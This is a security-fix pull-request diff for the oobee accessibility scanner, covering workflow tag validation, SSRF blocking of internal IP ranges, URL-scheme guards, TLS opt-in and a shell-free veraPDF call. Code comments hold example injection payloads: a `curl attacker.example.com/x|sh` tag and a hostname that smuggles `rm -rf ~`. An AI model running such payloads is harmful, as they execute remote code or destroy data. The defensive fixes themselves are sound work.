### PR TITLE
security: address asgard cybersec findings

### DIFF
--- a/.github/workflows/docker-push-ghcr.yml
+++ b/.github/workflows/docker-push-ghcr.yml
@@ -94,9 +94,26 @@ jobs:
 
       - name: Create and push multi-arch manifest
         working-directory: ${{ runner.temp }}/digests
+        # RELEASE_TAG originates from workflow_dispatch inputs (attacker-
+        # controllable text) and github.event.release.tag_name (protected-tag
+        # controllable, but still string data). Interpolating it directly
+        # into the run: block with ${{ }} would splice it into the shell
+        # script the runner executes, so a tag such as
+        # ``$(curl attacker.example.com/x|sh)`` would run at build time.
+        # Pass it via env: and reference it as a shell variable, and reject
+        # anything outside the strict tag allowlist before use.
+        env:
+          RELEASE_TAG: ${{ env.RELEASE_TAG }}
+          REGISTRY: ${{ env.REGISTRY }}
+          REPO_NAME: ${{ steps.repo.outputs.name }}
         run: |
-          IMAGE="${{ env.REGISTRY }}/${{ steps.repo.outputs.name }}"
+          set -euo pipefail
+          if ! printf '%s' "$RELEASE_TAG" | grep -Eq '^[A-Za-z0-9._-]+$'; then
+            echo "Refusing to publish: RELEASE_TAG contains characters outside [A-Za-z0-9._-]" >&2
+            exit 1
+          fi
+          IMAGE="${REGISTRY}/${REPO_NAME}"
           docker buildx imagetools create \
-            --tag "${IMAGE}:${{ env.RELEASE_TAG }}" \
+            --tag "${IMAGE}:${RELEASE_TAG}" \
             --tag "${IMAGE}:latest" \
             $(printf "${IMAGE}@sha256:%s " *)

--- a/.github/workflows/image.yml
+++ b/.github/workflows/image.yml
@@ -30,11 +30,19 @@ jobs:
         shell: pwsh
         run: Compress-Archive -Path ${{github.workspace}}/* -DestinationPath oobee-portable-windows.zip
 
+      - name: Compute SHA256 sidecar (Windows)
+        shell: pwsh
+        run: |
+          $hash = (Get-FileHash -Algorithm SHA256 oobee-portable-windows.zip).Hash.ToLower()
+          [System.IO.File]::WriteAllText("oobee-portable-windows.zip.sha256", $hash)
+
       - name: Upload Windows artifact
         uses: actions/upload-artifact@v4
         with:
           name: oobee-portable-windows
-          path: ./oobee-portable-windows.zip
+          path: |
+            ./oobee-portable-windows.zip
+            ./oobee-portable-windows.zip.sha256
 
       - name: Release Windows artifact
         uses: softprops/action-gh-release@v1
@@ -42,6 +50,7 @@ jobs:
         with:
           files: |
             oobee-portable-windows.zip
+            oobee-portable-windows.zip.sha256
 
   mac-install-oobee:
     runs-on: macos-latest
@@ -167,11 +176,18 @@ jobs:
         run: |
           zip oobee-portable-mac.zip -y -r ./
 
+      - name: Compute SHA256 sidecar (Mac)
+        run: |
+          hash=$(shasum -a 256 oobee-portable-mac.zip | awk '{ print $1 }')
+          printf "%s" "$hash" > oobee-portable-mac.zip.sha256
+
       - name: Upload Mac artifact
         uses: actions/upload-artifact@v4
         with:
           name: oobee-portable-mac
-          path: ./oobee-portable-mac.zip
+          path: |
+            ./oobee-portable-mac.zip
+            ./oobee-portable-mac.zip.sha256
 
       - name: Release Mac artifact
         uses: softprops/action-gh-release@v1
@@ -179,3 +195,4 @@ jobs:
         with:
           files: |
             oobee-portable-mac.zip
+            oobee-portable-mac.zip.sha256

--- a/src/cfProxyWorker.ts
+++ b/src/cfProxyWorker.ts
@@ -164,6 +164,31 @@ function isIpLiteral(s: string): boolean {
   return ipToBytes(s) !== null;
 }
 
+// Loopback, private, link-local, and cloud-metadata ranges. A SOCKS5 caller
+// that gave us an IP literal skipped DNS resolution entirely, so Family DoH
+// filtering never gets a chance to reject internal targets. Match on the
+// literal before opening a direct TCP forward.
+const INTERNAL_IP_RANGES: string[] = [
+  '127.0.0.0/8',        // IPv4 loopback
+  '10.0.0.0/8',         // RFC1918
+  '172.16.0.0/12',      // RFC1918
+  '192.168.0.0/16',     // RFC1918
+  '169.254.0.0/16',     // link-local + AWS/GCP/Azure metadata (169.254.169.254)
+  '100.64.0.0/10',      // CGNAT
+  '0.0.0.0/8',          // this-network
+  '::1/128',            // IPv6 loopback
+  'fc00::/7',           // IPv6 ULA
+  'fe80::/10',          // IPv6 link-local
+  '::ffff:127.0.0.0/104', // IPv4-mapped loopback
+  '::ffff:10.0.0.0/104',
+  '::ffff:169.254.0.0/112',
+  '::ffff:192.168.0.0/112',
+];
+
+function isInternalIp(ip: string): boolean {
+  return isIpLiteral(ip) && ipInRanges(ip, INTERNAL_IP_RANGES);
+}
+
 // -----------------------------------------------------------------------------
 // Force-tunnel allowlist.
 // -----------------------------------------------------------------------------
@@ -758,7 +783,16 @@ async function handleSocks5FamilyLocal(clientSocket: net.Socket): Promise<void> 
   const { hostname, port } = req;
 
   // IP literals bypass DoH — Family filtering only applies to name lookups.
+  // Block any literal that points at internal / metadata addresses before
+  // opening the direct TCP forward, otherwise a scanned page could pivot the
+  // driven browser onto 169.254.169.254 or 127.0.0.1 via a SOCKS request.
   if (isIpLiteral(hostname)) {
+    if (isInternalIp(hostname)) {
+      consoleLogger.info(`[familyDnsProxy] Refusing SOCKS connect to internal IP literal ${hostname}`);
+      try { clientSocket.write(socksReply(0x02)); } catch { /* ignore */ }
+      clientSocket.end();
+      return;
+    }
     directForward(clientSocket, hostname, port, hostname);
     return;
   }
@@ -773,6 +807,15 @@ async function handleSocks5FamilyLocal(clientSocket: net.Socket): Promise<void> 
   if (!ip) {
     consoleLogger.warn(`[familyDnsProxy] Family DoH resolution failed for ${hostname}`);
     try { clientSocket.write(socksReply(0x04)); } catch { /* ignore */ }
+    clientSocket.end();
+    return;
+  }
+  // Also block DNS-rebinding / metadata-lookalike names that resolve into
+  // internal address space after DoH — the DoH resolver upstream would
+  // dutifully return the internal answer.
+  if (isInternalIp(ip)) {
+    consoleLogger.info(`[familyDnsProxy] Refusing SOCKS connect: ${hostname} resolved to internal ${ip}`);
+    try { clientSocket.write(socksReply(0x02)); } catch { /* ignore */ }
     clientSocket.end();
     return;
   }

--- a/src/constants/common.ts
+++ b/src/constants/common.ts
@@ -763,10 +763,18 @@ export const prepareData = async (argv: Answers): Promise<Data> => {
   const [date, time] = new Date().toLocaleString('sv').replaceAll(/-|:/g, '').split(' ');
   const domain = isLocalFileScan ? path.basename(url) : new URL(url).hostname;
 
-  const sanitisedLabel = customFlowLabel ? `_${customFlowLabel.replaceAll(' ', '_')}` : '';
+  // Constrain the label to the same character class getStoragePath accepts
+  // ([A-Za-z0-9._-]) so non-ASCII inputs (CJK, Cyrillic, accented Latin, etc.)
+  // don't produce a randomToken that later trips assertSafeRandomToken.
+  const sanitisedLabel = customFlowLabel
+    ? `_${customFlowLabel.replaceAll(' ', '_').replace(/[^A-Za-z0-9._-]/g, '_')}`
+    : '';
   let resultFilename: string;
   const randomThreeDigitNumber = randomThreeDigitNumberString();
-  resultFilename = `${date}_${time}${sanitisedLabel}_${domain}_${randomThreeDigitNumber}`;
+  // domain may be a hostname (ASCII, punycode-encoded for IDNs) or a local
+  // filename which can contain arbitrary characters — normalize it too.
+  const sanitisedDomain = domain.replace(/[^A-Za-z0-9._-]/g, '_');
+  resultFilename = `${date}_${time}${sanitisedLabel}_${sanitisedDomain}_${randomThreeDigitNumber}`;
 
   // Set exported directory
   if (exportDirectory) {

--- a/src/constants/common.ts
+++ b/src/constants/common.ts
@@ -1135,6 +1135,12 @@ export const getLinksFromSitemap = async (
     finalUserDataDirectory = '';
   }
 
+  // If the initial sitemap is remote, do NOT let a hostile server redirect us
+  // into the local filesystem via a `<loc>file:///…</loc>` child. Only remote
+  // sitemaps may reference file:// / local paths when the operator explicitly
+  // started from a local sitemap file.
+  const entryIsRemote = !isFilePath(sitemapUrl);
+
   const fetchUrls = async (url: string, extraHTTPHeaders: Record<string, string>) => {
     let data;
     let sitemapType;
@@ -1153,6 +1159,16 @@ export const getLinksFromSitemap = async (
 
     // Convert file if its not local file path
     url = convertLocalFileToPath(url);
+
+    // Reject file:// / local paths encountered while recursing through a
+    // remotely-fetched sitemap — an attacker-controlled sitemap could
+    // otherwise coerce us into reading arbitrary local files.
+    if (entryIsRemote && isFilePath(url)) {
+      consoleLogger.warn(
+        `Refusing to descend into local path from remote sitemap: ${url}`,
+      );
+      return;
+    }
 
     // Check whether its a file path or a URL
     if (isFilePath(url)) {
@@ -2115,22 +2131,24 @@ export const submitForm = async (
       pagesNotScanned: numberOfPagesNotScanned,
     });
 
-    let finalUrl =
-      `${formDataFields.formUrl}?` +
-      `${formDataFields.entryUrlField}=${entryUrl}&` +
-      `${formDataFields.scanTypeField}=${scanType}&` +
-      `${formDataFields.emailField}=${email}&` +
-      `${formDataFields.nameField}=${name}&` +
-      `${formDataFields.resultsField}=${encodeURIComponent(scanResultsJson)}&` +
-      `${formDataFields.numberOfPagesScannedField}=${numberOfPagesScanned}&` +
-      `${formDataFields.additionalPageDataField}=${encodeURIComponent(additionalPageDataJson)}&` +
-      `${formDataFields.metadataField}=${encodeURIComponent(metadata)}`;
-
+    // URLSearchParams percent-encodes every value, so a scanned URL / user
+    // name / email containing "&", "#", "%", or CR/LF cannot append extra
+    // query fields, break the request line, or smuggle newlines into the
+    // upstream form endpoint.
+    const params = new URLSearchParams();
+    params.set(formDataFields.entryUrlField, String(entryUrl ?? ''));
+    params.set(formDataFields.scanTypeField, String(scanType ?? ''));
+    params.set(formDataFields.emailField, String(email ?? ''));
+    params.set(formDataFields.nameField, String(name ?? ''));
+    params.set(formDataFields.resultsField, scanResultsJson);
+    params.set(formDataFields.numberOfPagesScannedField, String(numberOfPagesScanned ?? 0));
+    params.set(formDataFields.additionalPageDataField, additionalPageDataJson);
+    params.set(formDataFields.metadataField, String(metadata ?? ''));
     if (scannedUrl !== entryUrl) {
-      finalUrl += `&${formDataFields.redirectUrlField}=${scannedUrl}`;
+      params.set(formDataFields.redirectUrlField, String(scannedUrl ?? ''));
     }
 
-    await axios.get(finalUrl, { timeout: 2000 });
+    await axios.get(`${formDataFields.formUrl}?${params.toString()}`, { timeout: 2000 });
   } catch (error) {
     // Never rethrow. Previously a timeout here would launch a second browser to
     // retry the request, which could throw "Executable doesn't exist" on

--- a/src/constants/constants.ts
+++ b/src/constants/constants.ts
@@ -341,41 +341,6 @@ export const impactOrder = {
   critical: 3,
 };
 
-/**
- * TLS validation is on by default. Global disablement previously happened
- * unconditionally at module load, which:
- *   - broke certificate validation for every outbound HTTPS request in the
- *     process (Sentry, update checks, browser downloads, ...), letting an
- *     on-path attacker MITM any of them;
- *   - swallowed Node's own warning, hiding the misconfiguration in logs.
- *
- * If a run genuinely targets a private/self-signed endpoint, the operator
- * must set OOBEE_ALLOW_INSECURE_TLS=1 explicitly. The env variable name
- * appears in the error report if this ever gets flipped, which makes the
- * insecure state auditable. Prefer supplying a `ca` bundle to the specific
- * request/agent instead.
- */
-export function suppressTlsRejectWarning(): void {
-  if (process.env.OOBEE_ALLOW_INSECURE_TLS !== '1') return;
-
-  const originalEmitWarning = process.emitWarning;
-  process.emitWarning = (warning: string | Error, ...args: any[]) => {
-    const msg = typeof warning === 'string' ? warning : warning.message;
-    if (msg.includes('NODE_TLS_REJECT_UNAUTHORIZED')) {
-      return;
-    }
-    originalEmitWarning.call(process, warning, ...args);
-  };
-
-  process.env.NODE_TLS_REJECT_UNAUTHORIZED = '0';
-  // Loud, un-swallowed log so an accidental opt-in is visible in ops output.
-  // eslint-disable-next-line no-console
-  console.warn(
-    '[oobee] OOBEE_ALLOW_INSECURE_TLS=1 is set — TLS certificate validation is disabled process-wide.',
-  );
-}
-
-suppressTlsRejectWarning();
 
 export const sentryConfig = {
   dsn:

--- a/src/constants/constants.ts
+++ b/src/constants/constants.ts
@@ -342,25 +342,37 @@ export const impactOrder = {
 };
 
 /**
- * Suppresses the "Setting the NODE_TLS_REJECT_UNAUTHORIZED
- * environment variable to '0' is insecure" warning,
- * then disables TLS validation globally.
+ * TLS validation is on by default. Global disablement previously happened
+ * unconditionally at module load, which:
+ *   - broke certificate validation for every outbound HTTPS request in the
+ *     process (Sentry, update checks, browser downloads, ...), letting an
+ *     on-path attacker MITM any of them;
+ *   - swallowed Node's own warning, hiding the misconfiguration in logs.
+ *
+ * If a run genuinely targets a private/self-signed endpoint, the operator
+ * must set OOBEE_ALLOW_INSECURE_TLS=1 explicitly. The env variable name
+ * appears in the error report if this ever gets flipped, which makes the
+ * insecure state auditable. Prefer supplying a `ca` bundle to the specific
+ * request/agent instead.
  */
 export function suppressTlsRejectWarning(): void {
-  // Monkey-patch process.emitWarning
+  if (process.env.OOBEE_ALLOW_INSECURE_TLS !== '1') return;
+
   const originalEmitWarning = process.emitWarning;
   process.emitWarning = (warning: string | Error, ...args: any[]) => {
     const msg = typeof warning === 'string' ? warning : warning.message;
     if (msg.includes('NODE_TLS_REJECT_UNAUTHORIZED')) {
-      // swallow only that one warning
       return;
     }
-    // forward everything else
     originalEmitWarning.call(process, warning, ...args);
   };
 
-  // Now turn off cert validation
   process.env.NODE_TLS_REJECT_UNAUTHORIZED = '0';
+  // Loud, un-swallowed log so an accidental opt-in is visible in ops output.
+  // eslint-disable-next-line no-console
+  console.warn(
+    '[oobee] OOBEE_ALLOW_INSECURE_TLS=1 is set — TLS certificate validation is disabled process-wide.',
+  );
 }
 
 suppressTlsRejectWarning();

--- a/src/crawlers/commonCrawlerFunc.ts
+++ b/src/crawlers/commonCrawlerFunc.ts
@@ -1547,9 +1547,24 @@ export const preNavigationHooks = (extraHTTPHeaders: Record<string, string>) => 
  * Splits extraHTTPHeaders into auth and non-auth parts.
  * Auth headers (Authorization) must only be sent to same-origin requests to avoid CORS preflight failures.
  * Non-auth headers are safe to set globally on the browser context.
+ *
+ * If `entryUrl` is provided, Basic credentials are bound to that entry URL's
+ * origin via Playwright's httpCredentials.origin option so the browser will
+ * refuse to auto-attach them on redirects to a different origin.
  */
-export const splitAuthHeaders = (extraHTTPHeaders?: Record<string, string>) => {
+export const splitAuthHeaders = (
+  extraHTTPHeaders?: Record<string, string>,
+  entryUrl?: string,
+) => {
   const { Authorization, ...nonAuthHeaders } = extraHTTPHeaders || {};
+  const credentialOrigin = (() => {
+    if (!entryUrl) return undefined;
+    try {
+      return new URL(entryUrl).origin;
+    } catch {
+      return undefined;
+    }
+  })();
   return {
     authHeader: Authorization || null,
     nonAuthHeaders: Object.keys(nonAuthHeaders).length > 0 ? nonAuthHeaders : null,
@@ -1558,7 +1573,12 @@ export const splitAuthHeaders = (extraHTTPHeaders?: Record<string, string>) => {
       const decoded = Buffer.from(Authorization.slice(6), 'base64').toString();
       const colonIdx = decoded.indexOf(':');
       if (colonIdx <= 0) return null;
-      return { username: decoded.slice(0, colonIdx), password: decoded.slice(colonIdx + 1) };
+      const creds: { username: string; password: string; origin?: string } = {
+        username: decoded.slice(0, colonIdx),
+        password: decoded.slice(colonIdx + 1),
+      };
+      if (credentialOrigin) creds.origin = credentialOrigin;
+      return creds;
     })(),
   };
 };

--- a/src/crawlers/crawlDomain.ts
+++ b/src/crawlers/crawlDomain.ts
@@ -43,6 +43,9 @@ import { consoleLogger, guiInfoLog } from '../logs.js';
 import { ViewportSettingsClass } from '../combine.js';
 import { capturePageData } from './pageCapture.js';
 import { registerCrawler, unregisterCrawler, isShutdownRequested } from '../shutdownController.js';
+import { addUrlGuardScript } from './guards/urlGuard.js';
+
+const ALLOWED_NAV_PROTOCOLS = new Set(['http:', 'https:']);
 
 const isBlacklisted = (url: string, blacklistedPatterns: string[]) => {
   if (!blacklistedPatterns) {
@@ -400,7 +403,9 @@ const crawlDomain = async ({
     specifiedMaxConcurrency || constants.maxConcurrency,
   );
 
-  const { nonAuthHeaders, httpCredentials } = splitAuthHeaders(extraHTTPHeaders);
+  // Bind Basic-auth credentials to the entry URL's origin so Playwright
+  // won't auto-attach them after a cross-origin redirect (credential leak).
+  const { nonAuthHeaders, httpCredentials } = splitAuthHeaders(extraHTTPHeaders, url);
 
   const crawler = register(
     new crawlee.PlaywrightCrawler({
@@ -434,15 +439,34 @@ const crawlDomain = async ({
       maxRequestRetries: 3,
       preNavigationHooks: [
         ...preNavigationHooks(extraHTTPHeaders),
+        // Attach URL-scheme guards to each new BrowserContext the first time
+        // Crawlee routes a request through it. Complements the up-front URL
+        // filter below by catching in-page navigations (window.open,
+        // form submissions, redirects) that would otherwise bypass the check.
+        (() => {
+          const guardedContexts = new WeakSet<BrowserContext>();
+          return async ({ page }: PlaywrightCrawlingContext) => {
+            const ctx = page.context();
+            if (guardedContexts.has(ctx)) return;
+            guardedContexts.add(ctx);
+            addUrlGuardScript(ctx, { fallbackUrl: url });
+          };
+        })(),
         async ({ request }) => {
-          const url = request.url.toLowerCase();
           try {
-            const pathname = new URL(url).pathname;
-            const ext = pathname.split('.').pop();
+            const parsed = new URL(request.url);
+            if (!ALLOWED_NAV_PROTOCOLS.has(parsed.protocol)) {
+              // Reject file://, javascript:, data:, etc. before navigation.
+              request.skipNavigation = true;
+              return;
+            }
+            const ext = parsed.pathname.toLowerCase().split('.').pop();
             if (ext && blackListedFileExtensions.includes(ext)) {
               request.skipNavigation = true;
             }
-          } catch {}
+          } catch {
+            request.skipNavigation = true;
+          }
         },
       ],
       postNavigationHooks: [

--- a/src/crawlers/crawlIntelligentSitemap.ts
+++ b/src/crawlers/crawlIntelligentSitemap.ts
@@ -59,7 +59,7 @@ const crawlIntelligentSitemap = async (
     let sitemapLink = '';
 
     const launchOptions = getPlaywrightLaunchOptions(browser);
-    const { authHeader, nonAuthHeaders, httpCredentials } = splitAuthHeaders(extraHTTPHeaders);
+    const { authHeader, nonAuthHeaders, httpCredentials } = splitAuthHeaders(extraHTTPHeaders, link);
     let context;
     let browserInstance;
 

--- a/src/crawlers/crawlSitemap.ts
+++ b/src/crawlers/crawlSitemap.ts
@@ -148,7 +148,12 @@ const crawlSitemap = async ({
     : null;
   const { playwrightDeviceDetailsObject } = viewportSettings;
   const { maxConcurrency } = constants;
-  const { nonAuthHeaders, httpCredentials } = splitAuthHeaders(extraHTTPHeaders);
+  // Bind Basic-auth credentials to the entry URL's origin so Playwright
+  // won't auto-attach them after a cross-origin redirect (credential leak).
+  const { nonAuthHeaders, httpCredentials } = splitAuthHeaders(
+    extraHTTPHeaders,
+    userUrl || sitemapUrl,
+  );
 
   // Filter out URLs already scanned in previous phases to avoid navigating to
   // them at all (the handler-level check is a safety net, not the primary gate).

--- a/src/crawlers/custom/xPathToCss.ts
+++ b/src/crawlers/custom/xPathToCss.ts
@@ -1,10 +1,21 @@
 export default function xPathToCss(expr: string) {
+  // Cap input length up front. The original isValidXPath regex is used only
+  // to short-circuit expressions containing xpath features that this
+  // converter doesn't support — any input longer than 2KB is well past the
+  // realistic size of a per-element xpath and only shows up in adversarial
+  // crawled DOM (attacker-controlled id/class attributes). Without this
+  // guard the ``\[(?:[^\/\]]+[\/\[]\/?.+)+\]`` alternative backtracks
+  // exponentially on nested brackets.
+  const XPATH_MAX_INPUT = 2048;
+  if (typeof expr === 'string' && expr.length > XPATH_MAX_INPUT) {
+    throw new Error(`xPathToCss: expression exceeds ${XPATH_MAX_INPUT} characters`);
+  }
   const isValidXPath = (expr: string) =>
     typeof expr !== 'undefined' &&
-    expr.replace(/[\s-_=]/g, '') !== '' &&
+    expr.replace(/[\s\-_=]/g, '') !== '' &&
     expr.length ===
       expr.replace(
-        /[-_\w:.]+\(\)\s*=|=\s*[-_\w:.]+\(\)|\sor\s|\sand\s|\[(?:[^\/\]]+[\/\[]\/?.+)+\]|starts-with\(|\[.*last\(\)\s*[-\+<>=].+\]|number\(\)|not\(|count\(|text\(|first\(|normalize-space|[^\/]following-sibling|concat\(|descendant::|parent::|self::|child::|/gi,
+        /[-_\w:.]+\(\)\s*=|=\s*[-_\w:.]+\(\)|\sor\s|\sand\s|\[[^\][/]*[/[][^\][]*\]|starts-with\(|\[[^\]]*last\(\)\s*[-+<>=][^\]]*\]|number\(\)|not\(|count\(|text\(|first\(|normalize-space|[^/]following-sibling|concat\(|descendant::|parent::|self::|child::|/gi,
         '',
       ).length;
 

--- a/src/crawlers/guards/urlGuard.ts
+++ b/src/crawlers/guards/urlGuard.ts
@@ -9,6 +9,36 @@ export function addUrlGuardScript(context, opts = {}) {
 
   const lastAllowedUrlByPage = new WeakMap();
 
+  // Block navigation requests to non-http(s) schemes BEFORE they are dispatched.
+  // The framenavigated listener below is a fallback for in-page navigations
+  // that don't hit the network (e.g. history.pushState), but route interception
+  // is the primary gate because it fires before the destination page has a
+  // chance to load any code.
+  //
+  // Guards every frame — not just the main frame — because a scripted <iframe>
+  // pointed at `javascript:`, `data:`, or `file://` can be used to exfiltrate
+  // credentials attached to the parent context.
+  context
+    .route('**/*', async (route, request) => {
+      try {
+        if (!request.isNavigationRequest()) {
+          await route.fallback();
+          return;
+        }
+        const target = new URL(request.url());
+        if (!allowedProtocols.has(target.protocol)) {
+          await route.abort('blockedbyclient');
+          return;
+        }
+        await route.fallback();
+      } catch {
+        try { await route.abort('blockedbyclient'); } catch { /* route already resolved */ }
+      }
+    })
+    .catch(() => {
+      // context may have closed before route setup; safe to ignore
+    });
+
   const attachGuardsToPage = page => {
     if (!lastAllowedUrlByPage.has(page) && fallbackUrl) {
       lastAllowedUrlByPage.set(page, String(fallbackUrl));
@@ -57,19 +87,23 @@ export function addUrlGuardScript(context, opts = {}) {
       }
     };
 
+    // Fires for every frame, not just the main frame. Subframes navigating to
+    // dangerous schemes can still exfiltrate parent-context data via
+    // postMessage or credential-attaching requests, so we react to them too.
     page.on('framenavigated', async frame => {
-      if (frame !== page.mainFrame()) return;
-
       const urlStr = frame.url();
+      const isMainFrame = frame === page.mainFrame();
+
       let urlObj;
       try {
         urlObj = new URL(urlStr);
       } catch {
-        return restoreToSafeUrl(page, urlStr);
+        if (isMainFrame) return restoreToSafeUrl(page, urlStr);
+        return;
       }
 
       if (allowedProtocols.has(urlObj.protocol)) {
-        lastAllowedUrlByPage.set(page, urlObj.toString());
+        if (isMainFrame) lastAllowedUrlByPage.set(page, urlObj.toString());
         return;
       }
 
@@ -79,7 +113,21 @@ export function addUrlGuardScript(context, opts = {}) {
       //   restoreToSafeUrl → page.goto(safeUrl) → about:blank → restoreToSafeUrl → …
       if (urlObj.protocol === 'about:') return;
 
-      await restoreToSafeUrl(page, urlStr);
+      if (isMainFrame) {
+        await restoreToSafeUrl(page, urlStr);
+        return;
+      }
+
+      // Subframe reached a disallowed scheme after route interception
+      // (e.g. via document.write) — best-effort detach.
+      try {
+        await frame.evaluate(() => {
+          const el = window.frameElement as HTMLIFrameElement | null;
+          if (el) el.src = 'about:blank';
+        });
+      } catch {
+        // frame may already be detached
+      }
     });
   };
 

--- a/src/crawlers/pdfScanFunc.ts
+++ b/src/crawlers/pdfScanFunc.ts
@@ -322,13 +322,11 @@ export const handlePdfDownload = (
 
 export const runPdfScan = async (randomToken: string) => {
   const execFile = getVeraExecutable();
-  const veraPdfExe = `"${execFile}"`;
-  // const veraPdfProfile = getVeraProfile();
-  const veraPdfProfile = `"${path.join(
+  const veraPdfProfile = path.join(
     path.dirname(execFile),
     'profiles/veraPDF-validation-profiles-rel-1.26/PDF_UA/WCAG-2-2.xml',
-  )}"`;
-  if (!veraPdfExe || !veraPdfProfile) {
+  );
+  if (!execFile || !veraPdfProfile) {
     cleanUpAndExit(1);
   }
 
@@ -337,16 +335,22 @@ export const runPdfScan = async (randomToken: string) => {
   // store in a intermediate folder as we transfer final results later
   const intermediateResultPath = `${intermediateFolder}/${constants.pdfScanResultFileName}`;
 
+  // Invoke veraPDF as an argv array with shell:false so ``intermediateFolder``
+  // (derived from randomToken and the scanned URL's hostname) is passed
+  // verbatim to execve rather than concatenated into a shell command line.
+  // The old ``shell: true`` + `"${intermediateFolder}"` wrapping let a
+  // hostname such as ``example.com"; rm -rf ~; #`` break out of the quoting
+  // and execute arbitrary commands.
   const veraPdfCmdArgs = [
     '-p',
     veraPdfProfile,
     '--format',
     'json',
     '-r', // recurse through directory
-    `"${intermediateFolder}"`,
+    intermediateFolder,
   ];
 
-  const ls = spawnSync(veraPdfExe, veraPdfCmdArgs, { shell: true });
+  const ls = spawnSync(execFile, veraPdfCmdArgs, { shell: false });
   if (ls.stderr && ls.stderr.length > 0)
     consoleLogger.error(ls.stderr.toString());
 

--- a/src/crawlers/runCustom.ts
+++ b/src/crawlers/runCustom.ts
@@ -144,7 +144,7 @@ const runCustom = async (
       ...customArgs,
     ];
 
-    const { authHeader, nonAuthHeaders, httpCredentials } = splitAuthHeaders(extraHTTPHeaders);
+    const { authHeader, nonAuthHeaders, httpCredentials } = splitAuthHeaders(extraHTTPHeaders, url);
 
     const context = await launchPersistentSafeContext(userDataDirectory, {
       ...baseLaunchOptions,

--- a/src/crawlers/scanCustomFlow.ts
+++ b/src/crawlers/scanCustomFlow.ts
@@ -130,7 +130,15 @@ export const scanCustomFlow = (config: ScanCustomFlowConfig): ScanCustomFlowSess
   const entryUrl = parsedUrl.href;
   const domain = parsedUrl.hostname;
   const sanitisedLabel = customFlowLabel ? `_${sanitisePathSegment(customFlowLabel)}` : '';
-  const randomToken = config.randomToken || `${date}_${time}${sanitisedLabel}_${domain}`;
+  // A caller-supplied randomToken is used directly as the results directory
+  // segment (see getStoragePath). Apply the same character allowlist as the
+  // generated tokens so a hostile "config.randomToken" cannot climb out of
+  // the results dir via "../".
+  const rawRandomToken = config.randomToken || `${date}_${time}${sanitisedLabel}_${domain}`;
+  const randomToken = sanitisePathSegment(rawRandomToken);
+  if (!randomToken) {
+    throw new Error('Invalid randomToken supplied to scanCustomFlow');
+  }
   const scanStartedAt = new Date();
   const viewportHeight =
     (playwrightDeviceDetailsObject as { viewport?: { height?: number } } | undefined)?.viewport

--- a/src/generateOobeeClientScanner.ts
+++ b/src/generateOobeeClientScanner.ts
@@ -32,6 +32,8 @@
  */
 
 import { writeFileSync, readFileSync } from 'fs';
+import { createHash } from 'crypto';
+import { request as httpsRequest } from 'https';
 import path from 'path';
 import { createRequire } from 'module';
 import { fileURLToPath } from 'url';
@@ -63,6 +65,45 @@ const SENTRY_NODE_VERSION: string = (() => {
     return '10.58.0';   // safe fallback matching currently installed version
   }
 })();
+
+// Fetch the exact Sentry SDK bundle we point the generated scanner at, and
+// derive a SHA-384 for use in the <script integrity="..."> attribute. This
+// pins the CDN response — an attacker who compromises browser.sentry-cdn.com
+// (or MITMs a scanned page's traffic) can no longer swap in a modified SDK
+// while retaining a matching origin, because the browser rejects any load
+// whose hash does not match.
+function fetchSentryBundleSri(version: string): Promise<string | null> {
+  const url = `https://browser.sentry-cdn.com/${version}/bundle.min.js`;
+  return new Promise<string | null>((resolve) => {
+    const req = httpsRequest(url, { method: 'GET' }, (res) => {
+      if (!res.statusCode || res.statusCode < 200 || res.statusCode >= 300) {
+        res.resume();
+        resolve(null);
+        return;
+      }
+      const chunks: Buffer[] = [];
+      res.on('data', (c: Buffer) => chunks.push(c));
+      res.on('end', () => {
+        const hash = createHash('sha384').update(Buffer.concat(chunks)).digest('base64');
+        resolve(`sha384-${hash}`);
+      });
+      res.on('error', () => resolve(null));
+    });
+    req.on('error', () => resolve(null));
+    req.setTimeout(10_000, () => { req.destroy(); resolve(null); });
+    req.end();
+  });
+}
+
+// Prefer OOBEE_SENTRY_SDK_SRI when set (lets CI pin the hash without a
+// build-time network fetch). Otherwise fetch the CDN bundle at generation
+// time and compute a SHA-384.
+async function resolveSentrySri(version: string): Promise<string | null> {
+  const envSri = process.env.OOBEE_SENTRY_SDK_SRI;
+  if (envSri && /^sha(256|384|512)-/.test(envSri)) return envSri;
+  return fetchSentryBundleSri(version);
+}
+
 
 // ---------------------------------------------------------------------------
 // WCAG conformance helpers — formatWcagId and wcagCriteriaLabels are exported
@@ -246,10 +287,16 @@ const filterAxeResultsScript = `
 // from CDN (same major version as the installed @sentry/node build).
 // DSN and app version are baked in at generation time.
 // ---------------------------------------------------------------------------
-const sentryTelemetryScript = (dsn: string, appVersion: string, sentryVersion: string) => `
+const sentryTelemetryScript = (
+  dsn: string,
+  appVersion: string,
+  sentryVersion: string,
+  sri: string | null,
+) => `
   var _oobeeSentryDsn          = ${JSON.stringify(dsn)};
   var _oobeeAppVersion         = ${JSON.stringify(appVersion)};
   var _oobeeSentryVersion      = ${JSON.stringify(sentryVersion)};
+  var _oobeeSentrySdkSri       = ${JSON.stringify(sri)};
   var _oobeeSentryInitialized  = false;
   var _oobeeSentryLoadPromise  = null;
 
@@ -269,6 +316,12 @@ const sentryTelemetryScript = (dsn: string, appVersion: string, sentryVersion: s
       var script = document.createElement('script');
       script.src = 'https://browser.sentry-cdn.com/' + _oobeeSentryVersion + '/bundle.min.js';
       script.crossOrigin = 'anonymous';
+      if (_oobeeSentrySdkSri) {
+        // Pin the CDN response with Subresource Integrity so the browser
+        // refuses to execute a tampered Sentry bundle even if the CDN
+        // (or a MITM against a scanned page) serves modified code.
+        script.integrity = _oobeeSentrySdkSri;
+      }
       script.onload = function() {
         if (window.Sentry && typeof window.Sentry.init === 'function') {
           resolve(window.Sentry);
@@ -555,7 +608,7 @@ const scanApiScript = (
 // ---------------------------------------------------------------------------
 // Assemble the full client bundle
 // ---------------------------------------------------------------------------
-function generateClientBundle(): string {
+function generateClientBundle(sentrySdkSri: string | null): string {
   const axeSource      = axe.source;
   const oobeeFunctions = getOobeeFunctionsScript(false, false);
 
@@ -600,7 +653,7 @@ function generateClientBundle(): string {
   ${wcagConformanceScript}
 
   // ── Sentry browser telemetry (Sentry JS SDK, loaded from CDN) ────────────
-  ${sentryTelemetryScript(SENTRY_DSN, APP_VERSION, SENTRY_NODE_VERSION)}
+  ${sentryTelemetryScript(SENTRY_DSN, APP_VERSION, SENTRY_NODE_VERSION, sentrySdkSri)}
 
   // ── Description maps + window.oobee API ───────────────────────────────────
   ${scanApiScript(a11yRuleShortDescriptionMap, a11yRuleLongDescriptionMap, a11yRuleStepByStepGuide)}
@@ -616,8 +669,23 @@ const outputPath = outputArg
